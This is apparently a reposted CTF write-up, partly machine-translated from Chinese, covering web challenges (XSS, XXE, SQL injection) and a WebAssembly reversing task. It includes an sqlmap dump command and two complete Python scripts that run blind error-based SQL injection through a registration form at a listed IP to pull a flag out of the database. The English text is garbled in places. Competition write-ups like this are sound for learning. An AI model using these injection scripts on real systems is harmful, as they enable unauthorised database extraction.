Verbatim large column https://www.dazhuanlan.com/2019/08/22/5d5e9b211840a/

Just got questions, when do question, XSS bunch of people, so I went along XSS

hit cookie is useless, then landing interface has an error

then an error trying to inject

final payload

After running about after the game sqlmap

1	python sqlmap.py -r C:1.txt --thread 10 -D bbs -T flag -C flag --dump

EIS {7879f0a27d8bcfcff0bcc837d7641e81}

SimpleExtensionExplorerInjection

Topic said XXE, with the flag of the document, and to the source code, but the title does submit json format

Reference: https://blog.netspi.com/playing-content-type-xxe-json-endpoints/

According to the article, the construction exp

SimplePrintEventLogger

This question points to the question I do not know why people like us, with XXE on a question you can read any document
reference: http://drops.xmd5.com/static/drops/tips-5290.html

SimpleServerInjection

Direct reference: https://www.secpulse.com/archives/66934.html

SimpleBlog

This question might be the most exciting road race title of the web, there will be a Tucao

A topic began to engage in a id this point out, have been thinking about how to get the secondary injection

Then submit your answers in the final Exam, found the answer to get the same score is random

直到下午4点，才发现注册用户名的时候，在得分这里，猜测后台会判断

1	where username='xxxxxx'

然后我们注册的时候发现

1	Decade' or if(1,1,pow(6,666666))#

1	Decade' or if(0,1,pow(6,666666))#

到这里才反应过来题目里面说的0分原来是这样弄到

下面直接上脚本

#! coding:utf-8

import requests
import sys
if sys.getdefaultencoding() != 'utf-8':
    reload(sys)
    sys.setdefaultencoding('utf-8')

def main():
    url="http://210.32.4.20/register.php"
    chars = 'abcdefghijklmnopqrstuvwxyz_0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ=+-*/{}?!:@#$%&()[],. '
    result=''

    for i in range(1,50):
        i =str(i)
        for j in chars:
            j=ord(j)
            username = """decade'or if((ascii(substr((select flag from flag),%s,1))=%s), 1, pow(6,666666666666))#"""%(i,j)
            data = {'username': username,
                    'password' : 'aaa',
                    }
            print username
            do_whlie = True
            while  do_whlie:
                try:
                    r=requests.post(url,data=data)
                    #print r.status_code
                    #print r.text
                    if r.status_code == 200:
                        do_whlie = False
                except Exception as e:
                    print str(e)
            html = login_and_answer(username)
            #print html
            if 'Your grades is 0' not in html:
                result += chr(j)
                print result
                break
            #print r.text

def login_and_answer(username):
    do_whlie = True
    while  do_whlie:
        try:
            url="http://210.32.4.20/login.php"
            data = {'username': username,
                    'password' : 'aaa',
                }
            s = requests.Session()
            r1 = s.post(url,data=data)
            #print r1.status_code
            #print r1.text
            url='http://210.32.4.20/answer.php'
            data = {'10.a':'on'}
            r2 = s.post(url,data=data)
            #print r2.status_code
            #print r2.text
            #exit()
            if r1.status_code == 200 and r2.status_code == 200:
                do_whlie = False
        except Exception as e:
            print str(e)
    return r2.text

if __name__ == "__main__":
    main()

import requests,re
import string



register_url = "http://210.32.4.20/register.php"
login_url = "http://210.32.4.20/login.php"
answer_url = "http://210.32.4.20/answer.php"

guess = "}{_"+string.digits+string.ascii_letters+"!@#$"


# payload = "1' and if((ascii(substr((select flag from flag limit 0,1),1,1))={}),exp(~(select * from(select user())a)),1)#"


flag = ""
for i in range(1,50):
    print "round: "+ str(i)
    for j in guess:
        print "[+]testing: "+j
        tmp = ord(j)
        payload = "1' and if((ascii(substr((select flag from flag),{},1))={}),exp(~(select * from(select user())a)),1)#"      
        print payload.format(i,tmp)
        data1 = {
            "username" : payload.format(i,tmp),
            "password" : "aaa"
        }
        data2 = {
            "9.d":"on"
        }
        re = requests.session()
        tt=re.post(register_url,data=data1)
        re.post(login_url,data=data1)
        res = re.post(answer_url,data2)
        if "<script>alert('Your grades is 0');</script>" in res.text:
            flag = flag+j
            break
    print "flag: "+flag

SimpleWasmReverse

这道题明摆着就是逆向题，然而web狗一窍不通，得到一个flag.wasm文档，然后因为逆向手粗心，当场没解出来，赛后pizza出洞，秒解，下面是wp（:逃
拿到wasm之后，用wasm2c工具转为c文档，再用gcc编译成.o，用ida打开

函数列表中找到可疑函数check()，稍做分析发现了函数f52，是base64加密函数，结合字符列表表中有似疑字符串aW9kan40NGgzOTNkNWZoNDtlOjloNmk1OThmNzk4O2dkPDRoZoA=，很明显是base64加密后的字符串。解密后为iodj~44h393d5fh4;e:9h6i598f798;gd<4hf€，再在check内容中分析，发现如下的代码：

while ( v14 != 38 )
  {
    v4 = v14++;
    v5 = i32_load8_s(Z_envZ_memory, v4 + a1);
    f797(v21, (unsigned __int8)(v5 + 3));
  }

You can see, the value of each bit added 3 -3 after decryption on the line

a='aW9kan40NGgzOTNkNWZoNDtlOjloNmk1OThmNzk4O2dkPDRoZoA='
s=''
a=a.decode('base64')
for i in range(len(a)):
	s+=chr(ord(a[i])-3)
print s

Get flag

to sum up

Next game redouble their efforts! Deep Come on!

National Chiao Tung University O & M game - Shenzhen University wp